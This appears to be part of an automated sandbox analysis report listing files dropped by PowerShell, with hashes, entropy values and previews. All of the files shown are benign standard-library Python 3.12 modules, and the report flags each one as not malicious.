                              Preview:.........U.f................................d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.d.l.m.Z...e.j8..................j;..................e.............d.d.l.m.Z.....d.d.l.m Z ....G.d...d.e.jB..........................Z"..G.d...d.e.jF..........................Z$..G.d...d.e.jJ..........................Z&..G.d...d.e'........Z(..G.d...d.e)........Z*..d.d.l.m*Z*....d.d.l.m+Z+..d.d.d.d...d...Z,d...Z-..d.d l.m-Z-....G.d!..d"e)........Z...G.d#..d$e.j^..........................Z0..G.d%..d&e.j^..........................Z1..G.d'..d(e.j8..........................Z2..G.d)..d*e.jf..........................Z4y.#.e.$.r...Y...w.x.Y.w.#.e.$.r...Y...w.x.Y.w.#.e.$.r...Y...w.x.Y.w.#.e.$.r...Y...w.x.Y.w.#.e.$.r...d...Z+Y...w.x.Y.w.#.e.$.r...Y...w.x.Y.w.)+a?...This module implements specialized container datatypes providing.alternatives to Python's general purpose built-in containers, dict,.list, set, and tuple...* namedtu
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):288
                              Entropy (8bit):5.007897507311768
                              Encrypted:false
                              SSDEEP:6:h4U/sAL6VvkGY/laE+MdF/HjEO/n6un23d6otGE2anI:hB/s56j+E5/6XIiG9anI
                              MD5:1C98064833D6F056B53B400D92BED716
                              SHA1:2EAE420B637FF89B8C7D9F3C1E724F4344045335
                              SHA-256:C8B9AD9008DF4081C2DC684F8920AD821B49C106EB4D642C1D0A77E49A8DF857
                              SHA-512:B7466F0BE0A1D173E82057FA55F9BE68FCF079B37E793DA10ED8F2B5382DB3A9F85D9760C5E2FFA9785DCC8186CEC92D7D86EB7C6820AABD5F6AC2B06444CBDC
                              Malicious:false
                              Preview:.........U.fz.........................&.....d.d.l.....d.d.l.m.Z...d.d.l.m.Z...y.)......)...*)...__all__)..._CallableGenericAliasN)..._collections_abcr....r............MC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\collections\abc.py..<module>r........s..............$..2r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):122
                              Entropy (8bit):4.154562766131627
                              Encrypted:false
                              SSDEEP:3:16dgXGviibaIF6dgXGvisxCK46dgXGviYHEubWyn:14gX5TIF4gX5GS4gX5AE/y
                              MD5:BEF5A0AF889CBE656D8F36952B66D86A
                              SHA1:F58423BE30ACEC27E1B47617F47D2B6C94F01A72
                              SHA-256:7AD86878712FC6682863F12208F4CED5DAF2DD82B6FF5ED58207DE29D0EFA410
                              SHA-512:9DD60F99DA7FCAABE8CE08AB012CD507A98EE6E47DDA4A4E462CEB57DB16653B97B21D1DF1436DCCEDB1CD4B59433CECB697BCC3E031B52585F67C8454DB487D
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:from _collections_abc import *..from _collections_abc import __all__..from _collections_abc import _CallableGenericAlias..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4228
                              Entropy (8bit):4.939538851329808
                              Encrypted:false
                              SSDEEP:96:DuOeR5U4DSJVq+XZuNtryth8ThWXZi6IX2:DuXPUyehZk1yQhUZMX2
                              MD5:F55DB067C4044A9A2B51EABE75C981F8
                              SHA1:A5B508A8245802C3F8BA917DFE2127B8E29CC17E
                              SHA-256:B5F4CA4DC00978554E19E0E577B4C6CF8D2BBCB3D475258C8796BF8CC37CB8D2
                              SHA-512:50C1233A4E285EC1F95C3BCB446A6CC02252FA2C525BBA17710AF3CEE1A9F81C84FE4F0C8CED868C84F2604C0D20AD4BAC8ED1A755B0892E9B1DE891A35AE7E3
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Conversion functions between RGB and other color systems.....This modules provides two functions for each color system ABC:.... rgb_to_abc(r, g, b) --> a, b, c.. abc_to_rgb(a, b, c) --> r, g, b....All inputs and outputs are triples of floats in the range [0.0...1.0]..(with the exception of I and Q, which covers a slightly larger range)...Inputs outside the valid range may cause exceptions or invalid outputs.....Supported color systems:..RGB: Red, Green, Blue components..YIQ: Luminance, Chrominance (used by composite video signals)..HLS: Hue, Luminance, Saturation..HSV: Hue, Saturation, Value.."""....# References:..# http://en.wikipedia.org/wiki/YIQ..# http://en.wikipedia.org/wiki/HLS_color_space..# http://en.wikipedia.org/wiki/HSV_color_space....__all__ = ["rgb_to_yiq","yiq_to_rgb","rgb_to_hls","hls_to_rgb",.. "rgb_to_hsv","hsv_to_rgb"]....# Some floating point constants....ONE_THIRD = 1.0/3.0..ONE_SIXTH = 1.0/6.0..TWO_THIRD = 2.0/3.0....# YIQ: used by composite video si
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):20976
                              Entropy (8bit):4.162846869835051
                              Encrypted:false
                              SSDEEP:384:kFvpRRcNykbCAH86PekbUH1B61Oep2QiNFIboUUW6cUu:kFRRRcBVHpP3YH18RfEiboeX
                              MD5:B3E790B4F84AC51093D8119D163EFBBC
                              SHA1:BE422C812A2172072B1586DC08B16F788CF9A044
                              SHA-256:5D52C02C00A7B58E5875F1EADDDED627919AE134F3927688167D634FADE5FE2E
                              SHA-512:8E1E99672E790B765BBB5ED74439AA61AE792BC4B54A5063A8BE328D55016E54084548890BCB8519DD4802E0001A4660699D306C05B330D6BE7E0145A7FAD0E2
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Module/script to byte-compile all .py files to .pyc files.....When called as a script with arguments, this compiles the directories..given as arguments recursively; the -l option prevents it from..recursing into directories.....Without arguments, it compiles all modules on sys.path, without..recursing into subdirectories. (Even though it should do so for..packages -- for now, you'll have to deal with packages separately.)....See module py_compile for details of the actual byte-compilation..."""..import os..import sys..import importlib.util..import py_compile..import struct..import filecmp....from functools import partial..from pathlib import Path....__all__ = ["compile_dir","compile_file","compile_path"]....def _walk_dir(dir, maxlevels, quiet=0):.. if quiet < 2 and isinstance(dir, os.PathLike):.. dir = os.fspath(dir).. if not quiet:.. print('Listing {!r}...'.format(dir)).. try:.. names = os.listdir(dir).. except OSError:.. if quiet < 2:..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):39
                              Entropy (8bit):4.2336188853070205
                              Encrypted:false
                              SSDEEP:3:SbF8tHyxVWSov:SbFUHoVjov
                              MD5:F8259102DFC36D919A899CDB8FDE48CE
                              SHA1:4510C766809835DAB814C25C2223009EB33E633A
                              SHA-256:52069AEEFB58DAD898781D8BDE183FFDA18FAAE11F17ACE8CE83368CAB863FB1
                              SHA-512:A77C8A67C95D49E353F903E3BD394E343C0DFA633DCFFBFD7C1B34D5E1BDFB9A372ECE71360812E44C5C5BADFA0FC81387A6F65F96616D6307083C2B3BB0213F
                              Malicious:false
                              Preview:# This directory is a Python package...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):178
                              Entropy (8bit):4.684993303702269
                              Encrypted:false
                              SSDEEP:3:onwllllGlllVO8l4+O/vh4E2J51X6rSEguIiwIaQHtgem/l:htctVne9n23d6CIaatgem/l
                              MD5:FD4925A3BDBFD0C4B5A1DB28BDF7AA48
                              SHA1:3D567863EABA6611BF5F6CFC677DE6769E756369
                              SHA-256:463477DF48183DDF8B6550597620D11CD43A5E8F74E171364E1BB6BA7B609339
                              SHA-512:03784133E6A24FFF60D1D9F6E61E422E1D4CD79F831942363BAA983BCD5CC2D5C71930D04E205A68C005EB36819E537E20D54C9FE40A81D5AE9E5C8556337836
                              Malicious:false
                              Preview:.........U.f'...............................y.).N..r..........QC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\concurrent\__init__.py..<module>r........s.........r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1611
                              Entropy (8bit):4.244150085152504
                              Encrypted:false
                              SSDEEP:24:QRFwLH5TbpZfLXA3TN9cf7Y961rTR0wMs8ShahNEmfh1GLurEX:kC5XjKK4QrTR05s8Sha7lfbGLuS
                              MD5:9B917BFF8EEA8F6CF7BB2F16043D0322
                              SHA1:D86064BBEC9785BF7C45333DB80142510D5AE2BD
                              SHA-256:28C2BDE9FF483CE03263B3874EE04BA1C80B18BA5F05871B4AD0BF7AEC1A322F
                              SHA-512:553D7F674B26A9F88FE5B10D2C7E19FE7B9E00999F5A9E8FB3ACA3E2307E77B4A7751642401AA1A26DC030AA10F69B4235901E1F724DEB52720D3D5FD7E9A40F
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:# Copyright 2009 Brian Quinlan. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Execute computations asynchronously using threads or processes."""....__author__ = 'Brian Quinlan (brian@sweetapp.com)'....from concurrent.futures._base import (FIRST_COMPLETED,.. FIRST_EXCEPTION,.. ALL_COMPLETED,.. CancelledError,.. TimeoutError,.. InvalidStateError,.. BrokenExecutor,.. Future,.. Executor,.. wait,.. as_completed)....__all__ = (.. 'FIRST_COMPLETED',.. 'FIRST_EXCEPTION',.. 'ALL_COMPLETED',.. 'CancelledError',.. 'TimeoutError',.. 'BrokenExecutor',.. 'Future',.. 'Executor',..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1289
                              Entropy (8bit):5.499520275051632
                              Encrypted:false
                              SSDEEP:24:hylmVXmMM5OJ8IQr5sAXhq3Wq/NbNZ9M76Fgj1dDsHOb8Eii+OP:kgk5IgsAXh9q/rMmFgj1dWB7qP
                              MD5:35D3DBD1E0161C3BB5DC36B56E66142B
                              SHA1:4B79E30CB083B89D2BDAE9DA5197F250FED0337F
                              SHA-256:6D1CEBF148CAC5DA1178BD9095FF8298F2C8F4F1B57B17F914C871CCD6DE90CB
                              SHA-512:A84E1205BCF0226C1C528BCA5C8999F71694162D44146B78B5716B06A684B7FDDFE73AF53746FA074B39B305B631D96B837C98B883222EDE26AC40B37EE64E6D
                              Malicious:false
                              Preview:.........U.fK.........................P.....d.Z.d.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.Z.d...Z.d...Z.y.).z?Execute computations asynchronously using threads or processes.z"Brian Quinlan (brian@sweetapp.com).....)...FIRST_COMPLETED..FIRST_EXCEPTION..ALL_COMPLETED..CancelledError..TimeoutError..InvalidStateError..BrokenExecutor..Future..Executor..wait..as_completed).r....r....r....r....r....r....r....r....r....r......ProcessPoolExecutor..ThreadPoolExecutorc...........................t.........d.z...S.).N)...__author__..__doc__)...__all__........YC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\concurrent\futures\__init__.py..__dir__r....$...s..................r....c.....................h.....|.d.k(..r.d.d.l.m.}...|.a.|.S.|.d.k(..r.d.d.l.m.}...|.a.|.S.t.........d.t...........d.|...............).Nr.........).r....r....).r....z.module z. has no attribute )...processr......threadr......AttributeError..__name__)...name..pe..tes.... r......__getattr__r!...(...sK.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):32227
                              Entropy (8bit):5.183819857423344
                              Encrypted:false
                              SSDEEP:384:h98g4R6U90jYrJe9f5z2Y4fxMi/NL9ARxieZq1xm0AjTbJgxGPsF5xx4i:h9urJ2xSY4f2sN2RxRq1xm0AjTexEgtt
                              MD5:C24FE840A8D31B40C7A6D6D8002872B1
                              SHA1:B074E83FA32CA0555CC4AC08C3EC102CF85DC597
                              SHA-256:D610F1546497604ADA546D26BE7CA7FE716D288B2DBA24D0D31462B5A7B24851
                              SHA-512:FCC0AE710F4DDF41AFEB0AB19B03A6D036711E157E252376D764C35E4498E5CE9C5739124B40DC4976F34D6439651E3817FB52F4F5E7AA0E042D1901940FB99A
                              Malicious:false
                              Preview:.........U.f.[..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.e.e.e.e.g.Z.e.d.e.d.e.d.e.d.e.d.i.Z...e.j"..................d.........Z...G.d...d.e.........Z...G.d...d.e.........Z.e.Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d e.........Z.d!..Z.d"..Z.d.d#..Z ..e.jB..................d$d%........Z"d.e.f.d&..Z#d.d'..Z$..G.d(..d)e.........Z%..G.d*..d+e.........Z&..G.d,..d-e'........Z(y.)/z"Brian Quinlan (brian@sweetapp.com).....N..FIRST_COMPLETED..FIRST_EXCEPTION..ALL_COMPLETED.._AS_COMPLETED..PENDING..RUNNING..CANCELLED..CANCELLED_AND_NOTIFIED..FINISHED..pending..running..cancelled..finishedz.concurrent.futuresc...........................e.Z.d.Z.d.Z.y.)...Errorz-Base class for all future-related exceptions.N....__name__..__module__..__qualname__..__doc__........VC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\concurrent\futures\_base.pyr....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):23487
                              Entropy (8bit):4.468492667420992
                              Encrypted:false
                              SSDEEP:384:IF2fpqHFF4MIEh8F60aoM0fSvPSmP049u35sBwwtJhkff5avYV:UrvjI7FmCSSms49u35sBwwtJhkHJ
                              MD5:26554F86CAD8AD806F4D2A1E7ED23814
                              SHA1:9355AE43D5E6071BFC509C799F686E180C91E10D
                              SHA-256:A5A450B5CCF2BC5ABF458BE32C7B2EB4E26C02C3D504EEF0E0682B5CFCFC6F52
                              SHA-512:C22154DEE0C8E7A45F7A0F748B277FF69137FA9A9F0A8E921F142A80336F6AA411560DE442D0C38C025D9A486D0902C59C72F3DA77696808D9670282160E9561
                              Malicious:false
                              Preview:# Copyright 2009 Brian Quinlan. All Rights Reserved...# Licensed to PSF under a Contributor Agreement.....__author__ = 'Brian Quinlan (brian@sweetapp.com)'....import collections..import logging..import threading..import time..import types....FIRST_COMPLETED = 'FIRST_COMPLETED'..FIRST_EXCEPTION = 'FIRST_EXCEPTION'..ALL_COMPLETED = 'ALL_COMPLETED'.._AS_COMPLETED = '_AS_COMPLETED'....# Possible future states (for internal use by the futures package)...PENDING = 'PENDING'..RUNNING = 'RUNNING'..# The future was cancelled by the user.....CANCELLED = 'CANCELLED'..# ...and _Waiter.add_cancelled() was called by a worker...CANCELLED_AND_NOTIFIED = 'CANCELLED_AND_NOTIFIED'..FINISHED = 'FINISHED'...._FUTURE_STATES = [.. PENDING,.. RUNNING,.. CANCELLED,.. CANCELLED_AND_NOTIFIED,.. FINISHED..]...._STATE_TO_DESCRIPTION_MAP = {.. PENDING: "pending",.. RUNNING: "running",.. CANCELLED: "cancelled",.. CANCELLED_AND_NOTIFIED: "cancelled",.. FINISHED: "finished"..}....# Logger
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):37235
                              Entropy (8bit):4.413288572976603
                              Encrypted:false
                              SSDEEP:768:Nf/K3m9sLuaJt7Z6sZ2lp/Q8hsOi/c6H0jXF5pNONrH+hBUM:NnK3m9guy0Hi/OpbuOh
                              MD5:13415F1B7520BEF5C54F683587CCBD5E
                              SHA1:792240CE53478DDE6A29D4E8371AB69ADB57EB63
                              SHA-256:4689ED6903089F2637C60BD50FE48D1F40F54A831DF8376C9EB7FEDEAB1361F2
                              SHA-512:A88979B87184BF2C2AE6558DA83A740EA389B0CD225FD6B1C273CB93DFCA9016DBDC3B68896D419D56C156459D877830007297A267B447D676F2D0281149520C
                              Malicious:false
                              Preview:# Copyright 2009 Brian Quinlan. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Implements ProcessPoolExecutor.....The following diagram and text describe the data-flow through the system:....|======================= In-process =====================|== Out-of-process ==|....+----------+ +----------+ +--------+ +-----------+ +---------+..| | => | Work Ids | | | | Call Q | | Process |..| | +----------+ | | +-----------+ | Pool |..| | | ... | | | | ... | +---------+..| | | 6 | => | | => | 5, call() | => | |..| | | 7 | | | | ... | | |..| Process | | ... | | Local | +-----------+ | Process |..| Pool | +----------+ | Worker | | #1..n |..| Executor | | Thread |
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):9123
                              Entropy (8bit):4.3331109272598995
                              Encrypted:false
                              SSDEEP:192:NVFRR//hda27aGhSoL/UDLWdLNEWjvb/DHjbbpU+izS9ek3/8N1x:NVFRb8DLWdLNvvb/npQ8a
                              MD5:18CE5D5779570B0C979B974B2EFF31B5
                              SHA1:F0D3DB82C4F9A4E9AFB068082344FC9EA925A9DA
                              SHA-256:FC15ADBE6B366E0142CA395F4CE16D241FEF2786516A9B3AD60E5A1B72555540
                              SHA-512:F8BBA1EB3BB47B50FC187F2D53F14AB1E0EAAABE2BFEDC53C6D0CC76DF4E4D68C6A31844B07A04DBBB28954828F0627A15E17756BA78056EE09968AB58ED1C90
                              Malicious:false
                              Preview:# Copyright 2009 Brian Quinlan. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Implements ThreadPoolExecutor."""....__author__ = 'Brian Quinlan (brian@sweetapp.com)'....from concurrent.futures import _base..import itertools..import queue..import threading..import types..import weakref..import os......_threads_queues = weakref.WeakKeyDictionary().._shutdown = False..# Lock that ensures that new workers are not created while the interpreter is..# shutting down. Must be held while mutating _threads_queues and _shutdown..._global_shutdown_lock = threading.Lock()....def _python_exit():.. global _shutdown.. with _global_shutdown_lock:.. _shutdown = True.. items = list(_threads_queues.items()).. for t, q in items:.. q.put(None).. for t, q in items:.. t.join()....# Register for `_python_exit()` to be called just before joining all..# non-daemon threads. This is used instead of `atexit.register()` for..# compatibility with subint
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):55122
                              Entropy (8bit):4.344869589718126
                              Encrypted:false
                              SSDEEP:1536:bBBEAmz8Ytkkp2NpD3VCuDkG02ep1WpYp4xGenkn2RP9g2p:bBBEAmz8Ytkjh3P9Jp
                              MD5:460C752AAB8A6895955A2D0CE1CA14F6
                              SHA1:77AC6D1C9112A903E9061F8EFB2FE464A8F3290C
                              SHA-256:899CF66AD2E7F035F0752DAD3D42E1B186A5F2B8B819AC3F625FC894937FF58B
                              SHA-512:2EBCC54B5EEDAB0CFC794CAD72BB2E1FF7C0F8BC7F0F1BA50222716D324683EDC07404E3A35E3CE8AA66F4BDA026C7CB501872C1D08A6A0884043C8CB0232822
                              Malicious:false
                              Preview:"""Configuration file parser.....A configuration file consists of sections, lead by a "[section]" header,..and followed by "name: value" entries, with continuations and such in..the style of RFC 822.....Intrinsic defaults can be specified by passing them into the..ConfigParser constructor as a dictionary.....class:....ConfigParser -- responsible for parsing a list of.. configuration files, and managing the parsed database..... methods:.... __init__(defaults=None, dict_type=_default_dict, allow_no_value=False,.. delimiters=('=', ':'), comment_prefixes=('#', ';'),.. inline_comment_prefixes=None, strict=True,.. empty_lines_in_values=True, default_section='DEFAULT',.. interpolation=<unset>, converters=<unset>):.... Create the parser. When `defaults` is given, it is initialized into the.. dictionary or intrinsic defaults. The keys must be strings, the values.. must be appropriate for %()s string in
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):28437
                              Entropy (8bit):4.350013505830429
                              Encrypted:false
                              SSDEEP:384:ArqxlsXri4ULtYBNcBOLUZfpqW9rz4ONszCAthtv6LDrxzCD:AexlfYBNcBicpqQQOginS
                              MD5:E73CF7B338173F1994E840FC6AB24684
                              SHA1:E0CF23D53654914EC6A781778BA2096FF1FB5657
                              SHA-256:A53B1DB774F19C6B1E4320C2BC64058C49E3FBA58B20B9C1158E5A8D02069890
                              SHA-512:B343DEB299C74C33821A2E865DC2D8F2F2985E214CD7D0E13FCF751E987FD8AD26527CEDCBA3885BE8D2B4EA8A4971FACF3073F41153A60614A72EA4FD70B25C
                              Malicious:false
                              Preview:"""Utilities for with-statement contexts. See PEP 343."""..import abc..import os..import sys..import _collections_abc..from collections import deque..from functools import wraps..from types import MethodType, GenericAlias....__all__ = ["asynccontextmanager", "contextmanager", "closing", "nullcontext",.. "AbstractContextManager", "AbstractAsyncContextManager",.. "AsyncExitStack", "ContextDecorator", "ExitStack",.. "redirect_stdout", "redirect_stderr", "suppress", "aclosing",.. "chdir"]......class AbstractContextManager(abc.ABC):.... """An abstract base class for context managers.""".... __class_getitem__ = classmethod(GenericAlias).... def __enter__(self):.. """Return `self` upon entering the runtime context.""".. return self.... @abc.abstractmethod.. def __exit__(self, exc_type, exc_value, traceback):.. """Raise any exception triggered within the runtime context.""".. return None.... @classmethod..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):133
                              Entropy (8bit):4.404091567342511
                              Encrypted:false
                              SSDEEP:3:16dWRIXJ7LRAuKLRAM174adR8iDFoNFH9LmduQ26GKadR6n:14WI57LRERHNT8iD6HaMQEpT6
                              MD5:031F54940ABDF481926457972FD90E0F
                              SHA1:75689CDC1D790A7BC71E507903A00882DB6B652A
                              SHA-256:758A96E17249E1E97C5CA5D1EE39AA31E5D439D0922AE7AF0064318E70B59FC8
                              SHA-512:187E365C0237144C2C3827305B8BB678BFE5161A4AC4AC0E115F78C199DE3D18438FA124CF4303A9175F82FBE8E45057A733337B35ED8B20F9575A18B066A8DC
                              Malicious:false
                              Preview:from _contextvars import Context, ContextVar, Token, copy_context......__all__ = ('Context', 'ContextVar', 'Token', 'copy_context')..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8704
                              Entropy (8bit):4.387327877038775
                              Encrypted:false
                              SSDEEP:192:Ve6OGrNnrF8C7ar5RlONoJTjIkWJYbOqmwKNgm0qu0JQZGWGy5:46OGrNnrFniv5JTPlm0T
                              MD5:815C3604F39E2CA5300D634E6BB4680A
                              SHA1:8152E8EA9928CC03A253FC6D519C2DD3F93A74EC
                              SHA-256:4A28A8FAE74106D128DDEED0B59EF38DEAB2F7B8B9D3BD006130C3CF75B42D34
                              SHA-512:F65B1BED4A4D7C42F49A55551610F2ADF1EAAFBD43116062FFBDF907D894918BDEDF2FFAC39CB6642A43FEFD70C86C3E7BA3C9BA4C0F94CC0E0F1104F31C7B39
                              Malicious:false
                              Preview:"""Generic (shallow and deep) copying operations.....Interface summary:.... import copy.... x = copy.copy(y) # make a shallow copy of y.. x = copy.deepcopy(y) # make a deep copy of y....For module specific errors, copy.Error is raised.....The difference between shallow and deep copying is only relevant for..compound objects (objects that contain other objects, like lists or..class instances).....- A shallow copy constructs a new compound object and then (to the.. extent possible) inserts *the same objects* into it that the.. original contains.....- A deep copy constructs a new compound object and then, recursively,.. inserts *copies* into it of the objects found in the original.....Two problems often exist with deep copy operations that don't exist..with shallow copy operations:.... a) recursive objects (compound objects that, directly or indirectly,.. contain a reference to themselves) may cause a recursive loop.... b) because deep copy copies *eve
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):7831
                              Entropy (8bit):4.481796603887747
                              Encrypted:false
                              SSDEEP:192:i0YOWh6R+k2vypRXb+7xV+0Xi+xCgGoqn4zs3ftHvpRDkT3LHQXTNS/DK:i7D6o/aDAxV+2UzoWI+fxxRyAS/DK
                              MD5:5EB8600498B0076C779DF8E9967CC987
                              SHA1:6AE4D522FD0E15A40553BE46FB0080CF837A2D40
                              SHA-256:EA2363638FE83E8E5B007013A821841371A615D99414B3C2F8F19152CA109A07
                              SHA-512:FAA410A313CE8A1E2427FB5AE8AA272689E71AE8C3F9C81E95820ED2B267BB79D7749754BEF05C24E702BC80BB288B77A14F6711C016DF405511822713EEE8C6
                              Malicious:false
                              Preview:"""Helper to provide extensibility for pickle.....This is only useful to add pickle support for extension types defined in..C, not for instances of user-defined classes..."""....__all__ = ["pickle", "constructor",.. "add_extension", "remove_extension", "clear_extension_cache"]....dispatch_table = {}....def pickle(ob_type, pickle_function, constructor_ob=None):.. if not callable(pickle_function):.. raise TypeError("reduction functions must be callable").. dispatch_table[ob_type] = pickle_function.... # The constructor_ob function is a vestige of safe for unpickling... # There is no reason for the caller to pass it anymore... if constructor_ob is not None:.. constructor(constructor_ob)....def constructor(object):.. if not callable(object):.. raise TypeError("constructors must be callable")....# Example: provide pickling support for complex numbers.....def pickle_complex(c):.. return complex, (c.real, c.imag)....pickle(complex, pickle_co
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4037
                              Entropy (8bit):4.832971821964293
                              Encrypted:false
                              SSDEEP:96:dIqV/Rq6HYaRBfmqj0vAhdjFRIJSXt/yOTHXQ:hFlfmo0cjFR8ot/yOjQ
                              MD5:58B893ED030C23C92F937769B3B9B8AF
                              SHA1:CC3A86B29E3227943CEB643987B8B1215A6F31A5
                              SHA-256:0FE812BD7DD51D8424590F08F0F74D36EA8C35D26110F5BA6172EC67DFF6E9E0
                              SHA-512:9E9BC793AEFEFF4A5DD55A0E3F356DC9194551E85BE6ACF033E4FFD9CA37718FD5F040C6141A8C26A8BDDFA5104517058F90ABD47BAB4003E72C74342775AA4D
                              Malicious:false
                              Preview:"""Wrapper to the POSIX crypt library call and associated functionality."""....import sys as _sys....try:.. import _crypt..except ModuleNotFoundError:.. if _sys.platform == 'win32':.. raise ImportError("The crypt module is not supported on Windows").. else:.. raise ImportError("The required _crypt module was not built as part of CPython")....import errno..import string as _string..import warnings..from random import SystemRandom as _SystemRandom..from collections import namedtuple as _namedtuple......warnings._deprecated(__name__, remove=(3, 13))......_saltchars = _string.ascii_letters + _string.digits + './'.._sr = _SystemRandom()......class _Method(_namedtuple('_Method', 'name ident salt_chars total_size')):.... """Class representing a salt method per the Modular Crypt Format or the.. legacy 2-character crypt method.""".... def __repr__(self):.. return '<crypt.METHOD_{}>'.format(self.name)......def mksalt(method=None, *, rounds=None):.. """Ge
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):16837
                              Entropy (8bit):4.374382068303762
                              Encrypted:false
                              SSDEEP:192:vJkxIK/P/zv/3I4aU/J4mJQ8cSfyuuxIQErDFYCiFBwbxZYwUu/6TTNMnzFcIO/G:vJaX3pzbM4rDiBwnC/acbsr
                              MD5:357ECA4DF52D3496E6A84679FB379084
                              SHA1:DBCD14E660E51F23E77BDF6767112B14C954E77C
                              SHA-256:8486CB388FE0DB87EC3F3330117EE3A9D70FC98BAA82B24A1D369E71E571F018
                              SHA-512:9703A60B8D66619E528E43C7AB7F98F166434C3BBD8481B96FCCEB7F97294E99A588D4434830BCFAA59FEA435B81545814DB5AD762853898B41F2155206CCEAA
                              Malicious:false
                              Preview:.."""..csv.py - read/write/investigate CSV files.."""....import re..import types..from _csv import Error, __version__, writer, reader, register_dialect, \.. unregister_dialect, get_dialect, list_dialects, \.. field_size_limit, \.. QUOTE_MINIMAL, QUOTE_ALL, QUOTE_NONNUMERIC, QUOTE_NONE, \.. QUOTE_STRINGS, QUOTE_NOTNULL, \.. __doc__..from _csv import Dialect as _Dialect....from io import StringIO....__all__ = ["QUOTE_MINIMAL", "QUOTE_ALL", "QUOTE_NONNUMERIC", "QUOTE_NONE",.. "QUOTE_STRINGS", "QUOTE_NOTNULL",.. "Error", "Dialect", "__doc__", "excel", "excel_tab",.. "field_size_limit", "reader", "writer",.. "register_dialect", "get_dialect", "list_dialects", "Sniffer",.. "unregister_dialect", "__version__", "DictReader", "DictWriter",.. "unix_dialect"]....class Dialect:.. """Describe a CSV dialect..... This must be subclassed (see csv.excel). Va
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):18761
                              Entropy (8bit):4.922522839654682
                              Encrypted:false
                              SSDEEP:192:5unNLq2cCplyyFriYYIgH+MKIPpXVege6pGXtS0ynb8055rev9RiRJX+CUgvlWYj:DcljFXgHTKweg0055re7oh+qvlWYj
                              MD5:D0859D693B9465BD1FF48DFE865833A3
                              SHA1:978C0511EF96D959E0E897D243752BC3A33BA17C
                              SHA-256:BB22C1BD20AFD47D33FA6958D8D3E55BEA7A1034DA8EF2D5F5C0BFF1225832C0
                              SHA-512:093026A7978122808554ADD8C53A2EAD737CAF125A102B8F66B36E5FD677E4DC31A93025511FCF9D0533AD2491D2753F792B3517B4DB0CFE0206E58A6D0E646C
                              Malicious:false
